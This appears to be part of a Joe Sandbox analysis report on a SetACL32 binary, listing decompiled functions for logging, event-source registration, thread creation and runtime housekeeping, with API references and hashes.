									} else {
										E012A2DD0(_t134,  &_v48, _t165, _t168, _t171, __eflags, _t194);
										_v12 = 1;
										__eflags = _v32 - _t171;
										if(_v32 != _t171) {
											_push(4);
											E01299A40( &_v48, _t194, L".log");
										} else {
											E012A1EE0(_t134,  &_v48, _t165, _t168, _t171, L"Emergency.log", 0xd);
										}
										__eflags = _v28 - 8;
										_t95 =  >=  ? _v48 :  &_v48;
										_t89 = E012A1EE0(_t134, 0x1309aa4, _t165, _t168, _t171,  >=  ? _v48 :  &_v48, _v32);
										_t165 = _v28;
										__eflags = _t165 - 8;
										if(_t165 < 8) {
											goto L40;
										} else {
											_t152 = _v48;
											_t165 = 2 + _t165 * 2;
											_t96 = _t152;
											__eflags = _t165 - 0x1000;
											if(_t165 < 0x1000) {
												L36:
												_push(_t165);
												_t89 = E012CAE27(_t152);
												goto L40;
											} else {
												_t152 =  *(_t152 - 4);
												_t165 = _t165 + 0x23;
												__eflags = _t96 - _t152 + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													E012CF35F(_t134, _t152, _t165, __eflags);
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_push(_t174);
													_push(_t152);
													_push(_v132);
													_push(_v136);
													_push(_v140);
													return E012A98F0(_t134, _t168, _t194, 1);
												} else {
													goto L36;
												}
											}
										}
									}
								}
							} else {
								goto L4;
							}
						}
					}
				}
			}























































              0x012a9500
              0x012a9500
              0x012a9500
              0x012a9500
              0x012a9500
              0x012a9503
              0x012a9505
              0x012a9510
              0x012a9511
              0x012a9514
              0x012a9519
              0x012a951b
              0x012a951e
              0x012a951f
              0x012a9523
              0x012a952e
              0x012a9535
              0x012a953b
              0x012a9542
              0x012a9549
              0x012a9550
              0x012a9557
              0x012a955e
              0x012a9561
              0x012a9565
              0x012a9569
              0x012a956f
              0x012a96f1
              0x012a96f1
              0x012a96f1
              0x00000000
              0x012a9575
              0x012a9575
              0x012a9576
              0x012a9587
              0x012a958c
              0x012a9592
              0x012a95c6
              0x012a95ca
              0x012a95e0
              0x012a95e9
              0x012a95f1
              0x012a95f6
              0x012a95fd
              0x012a9602
              0x012a9605
              0x012a9608
              0x012a963c
              0x012a963c
              0x012a9645
              0x012a964d
              0x012a9652
              0x012a9655
              0x012a9659
              0x012a965e
              0x012a9661
              0x012a9664
              0x00000000
              0x012a9666
              0x012a9666
              0x012a9669
              0x012a9670
              0x012a9672
              0x012a9678
              0x012a968e
              0x012a968e
              0x012a9690
              0x012a9695
              0x00000000
              0x012a967a
              0x012a967a
              0x012a967d
              0x012a9685
              0x012a9688
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a9688
              0x012a9678
              0x012a960a
              0x012a960a
              0x012a960d
              0x012a9614
              0x012a9616
              0x012a961c
              0x012a9632
              0x012a9632
              0x012a9634
              0x012a9639
              0x00000000
              0x012a961e
              0x012a961e
              0x012a9621
              0x012a9629
              0x012a962c
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a962c
              0x012a961c
              0x012a95cc
              0x012a95d3
              0x012a95d6
              0x012a9698
              0x012a969f
              0x012a96a6
              0x012a96be
              0x012a96c3
              0x012a96c8
              0x012a96cb
              0x012a96d0
              0x012a96d2
              0x012a96e7
              0x012a96ea
              0x00000000
              0x012a96d4
              0x012a96e0
              0x012a96e2
              0x012a96e2
              0x012a96f3
              0x012a96f6
              0x012a9726
              0x012a9728
              0x012a9734
              0x012a973b
              0x012a973f
              0x012a974a
              0x012a9752
              0x012a9760
              0x012a96f8
              0x012a96f8
              0x012a96fb
              0x012a9702
              0x012a970a
              0x012a971c
              0x012a971c
              0x012a971e
              0x00000000
              0x012a970c
              0x012a970c
              0x012a970f
              0x012a971a
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a971a
              0x012a970a
              0x012a96f6
              0x012a9594
              0x012a9594
              0x012a9597
              0x012a959e
              0x012a95a6
              0x012a95bc
              0x012a95bc
              0x012a95be
              0x012a95c3
              0x00000000
              0x012a95a8
              0x012a95a8
              0x012a95ab
              0x012a95b6
              0x012a9763
              0x012a9768
              0x012a9768
              0x012a976d
              0x012a976d
              0x012a9772
              0x012a9772
              0x012a9777
              0x012a9778
              0x012a9779
              0x012a977a
              0x012a977b
              0x012a977c
              0x012a977d
              0x012a977e
              0x012a977f
              0x012a9780
              0x012a9781
              0x012a9783
              0x012a9785
              0x012a9790
              0x012a9794
              0x012a9799
              0x012a979b
              0x012a979e
              0x012a979f
              0x012a97a0
              0x012a97a3
              0x012a97a9
              0x012a97b1
              0x012a97b8
              0x012a97be
              0x012a97c5
              0x012a97c7
              0x012a9858
              0x012a985a
              0x012a9860
              0x012a9860
              0x012a9863
              0x012a9866
              0x012a9866
              0x012a986b
              0x012a9876
              0x00000000
              0x012a97cd
              0x012a97cd
              0x012a97d3
              0x012a987b
              0x012a9880
              0x012a9889
              0x012a9891
              0x012a9895
              0x012a989f
              0x012a97d9
              0x012a97dc
              0x012a97e1
              0x012a97e8
              0x012a97eb
              0x012a97fb
              0x012a9802
              0x012a97ed
              0x012a97f4
              0x012a97f4
              0x012a9807
              0x012a9811
              0x012a981b
              0x012a9820
              0x012a9823
              0x012a9826
              0x00000000
              0x012a9828
              0x012a9828
              0x012a982b
              0x012a9832
              0x012a9834
              0x012a983a
              0x012a984c
              0x012a984c
              0x012a984e
              0x00000000
              0x012a983c
              0x012a983c
              0x012a983f
              0x012a9847
              0x012a984a
              0x012a98a2
              0x012a98a7
              0x012a98a8
              0x012a98a9
              0x012a98aa
              0x012a98ab
              0x012a98ac
              0x012a98ad
              0x012a98ae
              0x012a98af
              0x012a98b0
              0x012a98b3
              0x012a98b4
              0x012a98b7
              0x012a98ba
              0x012a98c6
              0x00000000
              0x00000000
              0x00000000
              0x012a984a
              0x012a983a
              0x012a9826
              0x012a97d3
              0x00000000
              0x00000000
              0x00000000
              0x012a95b6
              0x012a95a6
              0x012a9592

              APIs
              • EnterCriticalSection.KERNEL32 ref: 012A9535
              • LeaveCriticalSection.KERNEL32(0130B6D4), ref: 012A973F
                • Part of subcall function 012A9780: EnterCriticalSection.KERNEL32 ref: 012A97B8
                • Part of subcall function 012A9780: LeaveCriticalSection.KERNEL32(0130B6D4,?,?), ref: 012A9880
                • Part of subcall function 012A2DD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?), ref: 012A2E67
              • RegisterEventSourceW.ADVAPI32(00000000,00000000), ref: 012A96A6
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: CriticalSection$EnterLeave$EventFileModuleNameRegisterSource
              • String ID: DefaultEventSource
              • API String ID: 3706164908-1672983561
              • Opcode ID: 5e839b547f56663bf1d71fce947be380e5ceb34033e064c345f52217aefcd4da
              • Instruction ID: 5c0e03b87b4f6abd3ffcbcb53c753bd503b62179fd1ac305daca9c5d60086bf2
              • Opcode Fuzzy Hash: 5e839b547f56663bf1d71fce947be380e5ceb34033e064c345f52217aefcd4da
              • Instruction Fuzzy Hash: BB610871A2010A9FDF08EFB9CC85BEDBBB9EF54714F54421DD601A7285DB349A84CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D429A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51threadCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 936 12d429a-12d42a5 937 12d42bb-12d42ce call 12d424a 936->937 938 12d42a7-12d42ba call 12d3e40 call 12cf34f 936->938 944 12d42fc 937->944 945 12d42d0-12d42ed CreateThread 937->945 946 12d42fe-12d430a call 12d41bc 944->946 948 12d42ef-12d42fb call 12d3e0a 945->948 949 12d430b-12d4310 945->949 948->944 951 12d4317-12d431b 949->951 952 12d4312-12d4315 949->952 951->946 952->951
              C-Code - Quality: 90%
              			E012D429A(void* __ecx, struct _SECURITY_ATTRIBUTES* _a4, long _a8, intOrPtr _a12, intOrPtr _a16, long _a20, void* _a24) {
				signed int _v8;
				long _v12;
				void* _t14;
				void* _t17;
				void* _t29;
				void* _t32;

				_push(__ecx);
				_push(__ecx);
				_t34 = _a12;
				if(_a12 != 0) {
					_t14 = E012D424A(__ecx, __eflags, _a12, _a16);
					_v8 = _t14;
					__eflags = _t14;
					if(_t14 == 0) {
						L5:
						_t32 = 0;
						__eflags = 0;
					} else {
						_t17 = CreateThread(_a4, _a8, E012D413E, _t14, _a20,  &_v12); // executed
						_t32 = _t17;
						__eflags = _t32;
						if(_t32 != 0) {
							_t29 = _a24;
							__eflags = _t29;
							if(_t29 != 0) {
								 *_t29 = _v12;
							}
							_v8 = _v8 & 0x00000000;
						} else {
							E012D3E0A(GetLastError());
							goto L5;
						}
					}
					E012D41BC( &_v8);
					return _t32;
				} else {
					 *((intOrPtr*)(E012D3E40(_t34))) = 0x16;
					E012CF34F();
					return 0;
				}
			}









              0x012d429f
              0x012d42a0
              0x012d42a1
              0x012d42a5
              0x012d42c2
              0x012d42c7
              0x012d42cc
              0x012d42ce
              0x012d42fc
              0x012d42fc
              0x012d42fc
              0x012d42d0
              0x012d42e3
              0x012d42e9
              0x012d42eb
              0x012d42ed
              0x012d430b
              0x012d430e
              0x012d4310
              0x012d4315
              0x012d4315
              0x012d4317
              0x012d42ef
              0x012d42f6
              0x00000000
              0x012d42fb
              0x012d42ed
              0x012d4301
              0x012d430a
              0x012d42a7
              0x012d42ac
              0x012d42b2
              0x012d42ba
              0x012d42ba

              APIs
              • CreateThread.KERNELBASE ref: 012D42E3
              • GetLastError.KERNEL32(?,?,?,?,012A96C8,00000000,00000000), ref: 012D42EF
              • __dosmaperr.LIBCMT ref: 012D42F6
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: CreateErrorLastThread__dosmaperr
              • String ID: @Mhv
              • API String ID: 2744730728-3595611156
              • Opcode ID: 1597c263375d2bc37f84289074f204082cbd0782d54e6c38f55d12e0c5817211
              • Instruction ID: 0b0c5fb633e8a6287ea322fda4a717ff37ab88cb4645f9ff738fed8133f08664
              • Opcode Fuzzy Hash: 1597c263375d2bc37f84289074f204082cbd0782d54e6c38f55d12e0c5817211
              • Instruction Fuzzy Hash: ED019A7252025AAFDF16AFB5DC09AAE7FA5FF10324F100128EA0196580EB70CE40DB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D413E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38threadCOMMON
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 56%
              			E012D413E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t11;
				void* _t13;
				signed int _t18;
				intOrPtr* _t30;
				void* _t33;

				_t22 = __ebx;
				_push(0xc);
				_push(0x1307070);
				E012CBC40(__ebx, __edi, __esi);
				_t30 =  *((intOrPtr*)(_t33 + 8));
				if(_t30 == 0) {
					ExitThread(GetLastError());
				}
				 *((intOrPtr*)(E012D7220(__ecx, __edx) + 0x360)) = _t30;
				_t11 = E012DCB4E(__ecx); // executed
				_t36 = _t11 - 2;
				if(_t11 == 2) {
					_t18 = E012DA9D1(_t36, 1);
					asm("sbb al, al");
					 *((char*)(_t30 + 0x10)) =  ~_t18 + 1;
				}
				 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
				 *0x12ee308( *((intOrPtr*)(_t30 + 4))); // executed
				_t13 =  *((intOrPtr*)( *_t30))(); // executed
				E012D431D(_t22, _t30,  *_t30,  *(_t33 - 4), _t13);
				 *((intOrPtr*)(_t33 - 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t33 - 0x14))))));
				return E012D5B78( *((intOrPtr*)(_t33 - 0x14)),  *(_t33 - 4),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t33 - 0x14)))))),  *((intOrPtr*)(_t33 - 0x14)));
			}








              0x012d413e
              0x012d413e
              0x012d4140
              0x012d4145
              0x012d414a
              0x012d414f
              0x012d4158
              0x012d4158
              0x012d4163
              0x012d4169
              0x012d416e
              0x012d4171
              0x012d4175
              0x012d417c
              0x012d4180
              0x012d4180
              0x012d4183
              0x012d418e
              0x012d4194
              0x012d4197
              0x012d41a3
              0x012d41af

              APIs
              • GetLastError.KERNEL32(01307070,0000000C), ref: 012D4151
              • ExitThread.KERNEL32 ref: 012D4158
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorExitLastThread
              • String ID: @Mhv
              • API String ID: 1611280651-3595611156
              • Opcode ID: 32edc58982bb24cb7badd0610a156b8c5ebbf9b0396d2342d0d1641cf2be44de
              • Instruction ID: ee66037e34e7c7a0c7e07b02166a9bbe1d2173f7da5f80c2eb8352f0c88eeff8
              • Opcode Fuzzy Hash: 32edc58982bb24cb7badd0610a156b8c5ebbf9b0396d2342d0d1641cf2be44de
              • Instruction Fuzzy Hash: 8CF0CD71A50246AFEB11BFB0D809ABE7BB4FF20600F200249E1019B691CB75AA41DFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01291430 Relevance: 5.0, APIs: 4, Instructions: 38COMMON
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 53%
              			E01291430(void* __ecx, void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, struct _CRITICAL_SECTION* _a8) {
				void* _v8;
				char _v16;
				signed int _v20;
				char _v352;
				struct _CRITICAL_SECTION* _v356;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t18;
				void* _t24;
				void* _t30;
				void* _t31;
				void* _t40;
				void* _t42;
				intOrPtr* _t43;
				void* _t44;
				char* _t46;
				void* _t58;
				struct _CRITICAL_SECTION* _t59;
				void* _t61;
				void* _t62;
				intOrPtr* _t63;
				void* _t64;
				signed int _t65;
				void* _t72;

				_t72 = __eflags;
				_push(0xffffffff);
				_push(0x12e774b);
				_t18 =  *0x1309018; // 0xedd8d3b4
				_v20 = _t18 ^ _t65;
				 *[fs:0x0] =  &_v16;
				_t59 = _a8;
				_v356 = _t59;
				E012CFE5D(_t42, __ecx, __edx, _t59, _t62, 0, 0x12f983c); // executed
				E012A9500(_t42, __edx, _t59, _t62, __fp0, _t18 ^ _t65, _t58, _t62); // executed
				_t43 = EnterCriticalSection;
				EnterCriticalSection(0x130b6d4);
				_t63 = LeaveCriticalSection;
				 *0x1309a9c = 1;
				LeaveCriticalSection(0x130b6d4);
				EnterCriticalSection(0x130b6d4);
				 *0x1309aa0 = 1;
				LeaveCriticalSection(0x130b6d4);
				_t46 =  &_v352;
				L012AB1C0(EnterCriticalSection, _t46, _t72, _t42,  *[fs:0x0]);
				_push(_t46);
				_t57 = _t59;
				_v8 = 0;
				 *0x130b6b4 = 0;
				_t24 = L012915D0(_a4, _t59, __fp0);
				_t60 = _t24;
				if(_t24 == 0) {
					_t57 = _v356;
					_t40 = L012917C0(_a4, _v356, __fp0,  &_v352);
					_t60 = _t40;
					if(_t40 == 0) {
						_t60 = L012AE210(EnterCriticalSection,  &_v352, _t60, LeaveCriticalSection, __fp0);
					}
				}
				_v356 = 0x130b6d4;
				 *_t43(0x130b6d4);
				_v8 = 1;
				if( *0x1309a94 != 0) {
					E012AA9A0(0x1309ac4, 0);
					 *_t63(0x130b6d4);
					WaitForSingleObject( *0x1309a94, 0x3a98);
				} else {
					 *_t63(0x130b6d4);
				}
				 *_t43(0x130b6d4);
				_t30 =  *0x1309a94;
				if(_t30 != 0) {
					CloseHandle(_t30);
					 *0x1309a94 = 0;
				}
				_t31 =  *0x1309a90;
				if(_t31 != 0) {
					DeregisterEventSource(_t31);
					 *0x1309a90 = 0;
				}
				 *_t63();
				L012AB4A0(_t43,  &_v352, _t60);
				 *[fs:0x0] = _v16;
				_t61 = 0x130b6d4;
				_pop(_t64);
				_pop(_t44);
				return E012CAE19(_t60, _t44, _v20 ^ _t65, _t57, _t61, _t64);
			}





























              0x01291430
              0x01291433
              0x01291435
              0x01291447
              0x0129144e
              0x01291458
              0x0129145e
              0x01291468
              0x0129146e
              0x01291476
              0x0129147b
              0x01291486
              0x01291488
              0x01291493
              0x0129149d
              0x012914a4
              0x012914ab
              0x012914b5
              0x012914ba
              0x012914c0
              0x012914c5
              0x012914c9
              0x012914cb
              0x012914d2
              0x012914d9
              0x012914de
              0x012914e5
              0x012914e7
              0x012914f7
              0x012914fc
              0x01291503
              0x01291510
              0x01291510
              0x01291503
              0x01291517
              0x01291521
              0x01291523
              0x0129152e
              0x01291540
              0x0129154a
              0x01291557
              0x01291530
              0x01291535
              0x01291535
              0x01291562
              0x01291564
              0x0129156b
              0x0129156e
              0x01291574
              0x01291574
              0x0129157e
              0x01291585
              0x01291588
              0x0129158e
              0x0129158e
              0x0129159d
              0x012915a5
              0x012915af
              0x012915b7
              0x012915b8
              0x012915b9
              0x012915c7

              APIs
                • Part of subcall function 012A9500: EnterCriticalSection.KERNEL32 ref: 012A9535
                • Part of subcall function 012A9500: RegisterEventSourceW.ADVAPI32(00000000,00000000), ref: 012A96A6
              • EnterCriticalSection.KERNEL32(0130B6D4), ref: 01291486
              • LeaveCriticalSection.KERNEL32(0130B6D4), ref: 0129149D
              • EnterCriticalSection.KERNEL32(0130B6D4), ref: 012914A4
              • LeaveCriticalSection.KERNEL32(0130B6D4), ref: 012914B5
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: CriticalSection$Enter$Leave$EventRegisterSource
              • String ID:
              • API String ID: 2153909985-0
              • Opcode ID: 8f293c62044099a5168bd25120e35bc95c98fc6473b524777175219b3bfa026d
              • Instruction ID: 59762ff8e63d66f61ea63bba26064da9b83e78c0290ed925f28dddc942e7c70e
              • Opcode Fuzzy Hash: 8f293c62044099a5168bd25120e35bc95c98fc6473b524777175219b3bfa026d
              • Instruction Fuzzy Hash: 8F01D17195020CAFDB21EF66DC55F9ABBE8EB15B28F000229E4086B385DB706844CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D41F3 Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 984 12d41f3-12d4200 call 12d7377 987 12d4240-12d4243 ExitThread 984->987 988 12d4202-12d420a 984->988 988->987 989 12d420c-12d4210 988->989 990 12d4217-12d421d 989->990 991 12d4212 call 12daa0c 989->991 993 12d421f-12d4221 990->993 994 12d422a-12d4230 990->994 991->990 993->994 995 12d4223-12d4224 CloseHandle 993->995 994->987 996 12d4232-12d4234 994->996 995->994 996->987 997 12d4236-12d423a FreeLibraryAndExitThread 996->997 997->987
              C-Code - Quality: 100%
              			E012D41F3(long _a4) {
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t13;

				_t7 = E012D7377(_t12);
				if(_t7 == 0) {
					L10:
					ExitThread(_a4);
				}
				_t13 =  *((intOrPtr*)(_t7 + 0x360));
				if(_t13 == 0) {
					goto L10;
				}
				_t16 =  *((char*)(_t13 + 0x10));
				if( *((char*)(_t13 + 0x10)) != 0) {
					E012DAA0C(_t16);
				}
				_t8 =  *(_t13 + 8);
				if(_t8 != 0xffffffff && _t8 != 0) {
					CloseHandle(_t8);
				}
				_t9 =  *(_t13 + 0xc);
				if(_t9 != 0xffffffff && _t9 != 0) {
					FreeLibraryAndExitThread(_t9, _a4); // executed
				}
				goto L10;
			}








              0x012d41f9
              0x012d4200
              0x012d4240
              0x012d4243
              0x012d4243
              0x012d4202
              0x012d420a
              0x00000000
              0x00000000
              0x012d420c
              0x012d4210
              0x012d4212
              0x012d4212
              0x012d4217
              0x012d421d
              0x012d4224
              0x012d4224
              0x012d422a
              0x012d4230
              0x012d423a
              0x012d423a
              0x00000000

              APIs
                • Part of subcall function 012D7377: GetLastError.KERNEL32(?,?,?,012D3E45,012D8035,?,?,012D6ACD), ref: 012D737C
                • Part of subcall function 012D7377: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,012D3E45,012D8035,?,?,012D6ACD), ref: 012D741A
              • CloseHandle.KERNEL32(?,?,?,012D432A,?,?,012D419C,00000000), ref: 012D4224
              • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,012D432A,?,?,012D419C,00000000), ref: 012D423A
              • ExitThread.KERNEL32 ref: 012D4243
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
              • String ID:
              • API String ID: 1991824761-0
              • Opcode ID: 06f84c5e6118adfa6757864fe46de6c6016fea0d43f57fe42efbe117b2cfa621
              • Instruction ID: 8e851f22e9b69db2c668ff997757d944f58c5db39f62c2b1d75d04095948d07f
              • Opcode Fuzzy Hash: 06f84c5e6118adfa6757864fe46de6c6016fea0d43f57fe42efbe117b2cfa621
              • Instruction Fuzzy Hash: FBF082304106836BEB312F79E84CA5A3EA8AF25360B594610FF29CB9D0DB30E881C791
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012CA8B1 Relevance: 3.0, APIs: 2, Instructions: 50COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 40%
              			E012CA8B1(intOrPtr __eax, intOrPtr __ebx, intOrPtr __edx, void* __edi, intOrPtr __esi, intOrPtr _a4) {
				signed int _v8;
				signed int* _v12;
				void* __ebp;
				void* _t18;
				int _t21;
				void* _t25;
				signed int* _t26;
				signed int _t28;
				signed int _t29;
				intOrPtr _t30;
				signed int _t33;
				void* _t37;

				_t32 = __esi;
				_t31 = __edi;
				_t30 = __edx;
				_t24 = __ebx;
				if( *0x1309008 == 0) {
					__eflags = E012D43F9();
					if(__eflags != 0) {
						E012D4447(__ebx, __edi, __esi, __eflags);
						_t25 = 0x16;
					}
					__eflags =  *0x1309190 & 0x00000002;
					if(( *0x1309190 & 0x00000002) != 0) {
						_t21 = IsProcessorFeaturePresent(0x17);
						__eflags = _t21;
						if(_t21 != 0) {
							_t25 = 7;
							asm("int 0x29");
						}
						E012CF1A3(_t24, _t30, _t32, 3, 0x40000015, 1);
						_t37 = _t37 + 0xc;
					}
					E012D664A(3);
					asm("int3");
					_push(8);
					_push(0x13070f0);
					E012CBC40(_t24, _t31, _t32);
					_t33 =  *(E012D7220(_t25, _t30) + 0xc);
					__eflags = _t33;
					if(_t33 != 0) {
						_v8 = _v8 & 0x00000000;
						 *0x12ee308();
						 *_t33();
						_v8 = 0xfffffffe;
					}
					L2();
					asm("int3");
					_t26 = _v12;
					_t18 = 0;
					__eflags =  *_t26;
					if( *_t26 != 0) {
						while(1) {
							__eflags = _t18 - _a4;
							if(_t18 == _a4) {
								goto L16;
							}
							_t18 = _t18 + 1;
							__eflags =  *((char*)(_t18 + _t26));
							if( *((char*)(_t18 + _t26)) != 0) {
								continue;
							}
							goto L16;
						}
					}
					L16:
					return _t18;
				} else {
					__imp__EncodePointer(_a4);
					_t28 =  *0x1309008; // 0xa
					_t29 = _t28 - 1;
					 *0x1309008 = _t29;
					 *((intOrPtr*)(0x130a8b8 + _t29 * 4)) = __eax;
					return __eax;
				}
			}















              0x012ca8b1
              0x012ca8b1
              0x012ca8b1
              0x012ca8b1
              0x012ca8bb
              0x012d5777
              0x012d5779
              0x012d577d
              0x012d5782
              0x012d5782
              0x012d5783
              0x012d578a
              0x012d578e
              0x012d5794
              0x012d5796
              0x012d579a
              0x012d579b
              0x012d579b
              0x012d57a6
              0x012d57ab
              0x012d57ab
              0x012d57b0
              0x012d57b5
              0x012d57b6
              0x012d57b8
              0x012d57bd
              0x012d57c7
              0x012d57ca
              0x012d57cc
              0x012d57ce
              0x012d57d4
              0x012d57da
              0x012d57e5
              0x012d57e5
              0x012d57ec
              0x012d57f1
              0x012d57f7
              0x012d57fa
              0x012d57fc
              0x012d57fe
              0x012d5800
              0x012d5800
              0x012d5803
              0x00000000
              0x00000000
              0x012d5805
              0x012d5806
              0x012d580a
              0x00000000
              0x00000000
              0x00000000
              0x012d580a
              0x012d5800
              0x012d580d
              0x012d580d
              0x012ca8c1
              0x012ca8c4
              0x012ca8ca
              0x012ca8d0
              0x012ca8d1
              0x012ca8d7
              0x012ca8df
              0x012ca8df

              APIs
              • RtlEncodePointer.NTDLL(00000000,?,012C9F70,012C9FB6,?,012C9DFD,00000000,00000000,00000000,00000004,0129AF47,00000001,EDD8D3B4,00000000,?,?), ref: 012CA8C4
              • IsProcessorFeaturePresent.KERNEL32(00000017,012D72DC,?,?,012D4163,01307070,0000000C), ref: 012D578E
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: EncodeFeaturePointerPresentProcessor
              • String ID:
              • API String ID: 4030241255-0
              • Opcode ID: bd9f786ac3b35cda5ad14a0a219e0016672c8de293b0f66c036444f1c1f9d180
              • Instruction ID: 322f20a97226e1153cfe318676f62f9b945002c57a228d237348316cc17ffd25
              • Opcode Fuzzy Hash: bd9f786ac3b35cda5ad14a0a219e0016672c8de293b0f66c036444f1c1f9d180
              • Instruction Fuzzy Hash: 7701F530564307EBF7297B64F81DB793AA8AB10B18F224019EB0C5A1C1CBF045818751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012DA656 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
              Download Yara Rule
              C-Code - Quality: 50%
              			E012DA656(intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				void* _t20;
				intOrPtr* _t22;

				_t22 = E012DA388();
				if(_t22 == 0) {
					return CompareStringW(E012DA9A0(_a4, 0), _a8, _a12, _a16, _a20, _a24);
				}
				 *0x12ee308(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36); // executed
				_t20 =  *_t22(); // executed
				return _t20;
			}





              0x012da661
              0x012da665
              0x00000000
              0x012da6a8
              0x012da684
              0x012da68a
              0x00000000

              APIs
              • CompareStringEx.KERNELBASE(?,012E30AF,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,7FFFFFFF,?,012DC1BB,?,00001001), ref: 012DA68A
